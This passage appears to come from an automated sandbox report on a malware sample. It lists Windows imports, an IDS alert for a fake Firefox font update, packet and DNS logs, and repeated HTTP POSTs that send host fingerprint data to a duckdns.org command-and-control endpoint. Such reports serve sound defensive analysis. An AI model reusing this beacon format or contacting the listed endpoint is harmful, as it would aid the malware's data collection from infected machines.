AcquireSRWLockExclusive, DeleteCriticalSection, EnterCriticalSection, FlsAlloc, FlsGetValue, FlsSetValue, GetLastError, GetModuleHandleW, GetProcAddress, GetSystemTimeAsFileTime, InitOnceExecuteOnce, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlRestoreContext, RtlUnwindEx, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T17:38:28.464034+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	173.244.207.29	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:38:27.806127071 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:27.806174040 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:27.806250095 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:27.807934046 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:27.807954073 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.463948011 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.464034081 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.465034008 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.465104103 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.468867064 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.468873978 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.469122887 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.516145945 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.516179085 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.516282082 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.767560005 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.767633915 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.767864943 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.767960072 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.767960072 CET	49731	443	192.168.2.4	173.244.207.29
Jan 12, 2025 17:38:28.767976046 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:28.767986059 CET	443	49731	173.244.207.29	192.168.2.4
Jan 12, 2025 17:38:29.311034918 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:29.315896988 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:29.315969944 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:29.316138983 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:29.316138983 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:29.320987940 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:29.320997953 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:29.996419907 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:30.049283028 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:33.177155018 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:33.177155018 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:33.182037115 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:33.182050943 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:33.393832922 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:33.439902067 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:37.019069910 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:37.019179106 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:37.024023056 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:37.024029016 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:37.233493090 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:37.290340900 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:40.379921913 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:40.379961967 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:40.384757996 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:40.384772062 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:40.594120026 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:40.692039967 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:42.738411903 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:42.738526106 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:42.743253946 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:42.743362904 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:43.109447002 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:43.190018892 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:46.301794052 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:46.301820040 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:46.306595087 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:46.306606054 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:46.674504042 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:46.799348116 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:49.646140099 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:49.646140099 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:49.651122093 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:49.651134968 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:50.017112970 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:50.092758894 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:53.017200947 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:53.017251015 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:53.022211075 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:53.022228956 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:53.231898069 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:53.299415112 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:54.954823971 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:54.955024958 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:54.959923029 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:54.960050106 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:55.326200008 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:55.393130064 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:56.989052057 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:56.989339113 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:57.148298025 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:57.148313046 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:57.356446028 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:57.502525091 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:59.352034092 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:59.352082014 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:38:59.356944084 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:59.356964111 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:59.567553043 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:38:59.693026066 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:01.303641081 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:01.303641081 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:01.308680058 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:01.308722973 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:01.675405979 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:01.799415112 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:04.713134050 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:04.713165998 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:04.717912912 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:04.717958927 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:05.082638025 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:05.190054893 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:06.945420980 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:06.945441961 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:06.950258970 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:06.950269938 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:07.318682909 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:07.502604961 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:09.196762085 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:09.196763039 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:09.202507019 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:09.202522039 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:09.565880060 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:09.690119982 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:10.702435970 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:10.702502966 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:10.702513933 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:10.702610016 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:11.983525038 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:11.983609915 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:11.988456011 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:11.988488913 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:12.354258060 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:12.502595901 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:15.086321115 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:15.086411953 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:15.131720066 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:15.131732941 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:15.336731911 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:15.460072994 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:18.202239990 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:18.202373028 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:18.207118034 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:18.207173109 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:18.575197935 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:18.691076994 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:21.229813099 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:21.229861975 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:21.234714985 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:21.234728098 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:21.601856947 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:21.647281885 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:24.564680099 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:24.564783096 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:24.569631100 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:24.569645882 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:24.934196949 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:25.002633095 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:27.656596899 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:27.656596899 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:27.661381960 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:27.661391973 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:28.025451899 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:28.190202951 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:30.870609045 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:30.870654106 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:30.875447035 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:30.875463009 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:31.242050886 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:31.299546003 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:34.035517931 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:34.035662889 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:34.040364981 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:34.040400982 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:34.408330917 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:34.502677917 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:37.069493055 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:37.069586992 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:37.075778961 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:37.075793982 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:37.441191912 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:37.502693892 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:39.883645058 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:39.883892059 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:39.962496996 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:39.962531090 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:40.168404102 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:40.299595118 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:42.467192888 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:42.467279911 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:42.472943068 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:42.472980022 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:42.681922913 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:42.855281115 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:45.304141045 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:45.304430008 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:45.309098005 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:45.309201002 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:45.673830032 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:45.799839020 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:48.381927013 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:48.381972075 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:48.394234896 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:48.394248009 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:48.602425098 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:48.799617052 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:51.222837925 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:51.222837925 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:51.227767944 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:51.227804899 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:51.594625950 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:51.690376043 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:54.243062973 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:54.243134975 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:54.248049021 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:54.248068094 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:54.613835096 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:54.690268040 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:57.271044970 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:57.271044970 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:39:57.276010036 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:57.276026011 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:57.642462015 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:39:57.691524982 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:00.363336086 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:00.363337040 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:00.369561911 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:00.369932890 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:00.586632967 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:00.647607088 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:03.191436052 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:03.191437006 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:03.196516037 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:03.196538925 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:03.563396931 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:03.690330982 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:06.121020079 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:06.121020079 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:06.126008034 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:06.126025915 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:06.489887953 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:06.690428019 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:09.435264111 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:09.435328007 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:09.440429926 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:09.440474033 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:09.826176882 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:10.002840042 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:12.363176107 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:12.363245964 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:12.368283987 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:12.368324995 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:12.586406946 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:12.691365004 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:15.413937092 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:15.413937092 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:15.419095993 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:15.419137955 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:15.786204100 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:16.002911091 CET	49732	80	192.168.2.4	193.233.113.77
Jan 12, 2025 17:40:20.791327953 CET	80	49732	193.233.113.77	192.168.2.4
Jan 12, 2025 17:40:20.791644096 CET	49732	80	192.168.2.4	193.233.113.77

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:38:27.790919065 CET	51893	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:38:27.797873974 CET	53	51893	1.1.1.1	192.168.2.4
Jan 12, 2025 17:38:29.208605051 CET	57957	53	192.168.2.4	1.1.1.1
Jan 12, 2025 17:38:29.310198069 CET	53	57957	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 17:38:27.790919065 CET	192.168.2.4	1.1.1.1	0x8561	Standard query (0)	polygon-rpc.com	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:38:29.208605051 CET	192.168.2.4	1.1.1.1	0xbab5	Standard query (0)	blockchainlegion.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 17:38:27.797873974 CET	1.1.1.1	192.168.2.4	0x8561	No error (0)	polygon-rpc.com		173.244.207.29	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:38:29.310198069 CET	1.1.1.1	192.168.2.4	0xbab5	No error (0)	blockchainlegion.duckdns.org		193.233.113.77	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

polygon-rpc.com

blockchainlegion.duckdns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	193.233.113.77	80	7720	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:38:29.316138983 CET	145	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:29.316138983 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:29.996419907 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:29 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:33.177155018 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:33.177155018 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:33.393832922 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:33 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:37.019069910 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:37.019179106 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:37.233493090 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:40.379921913 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:40.379961967 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:40.594120026 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
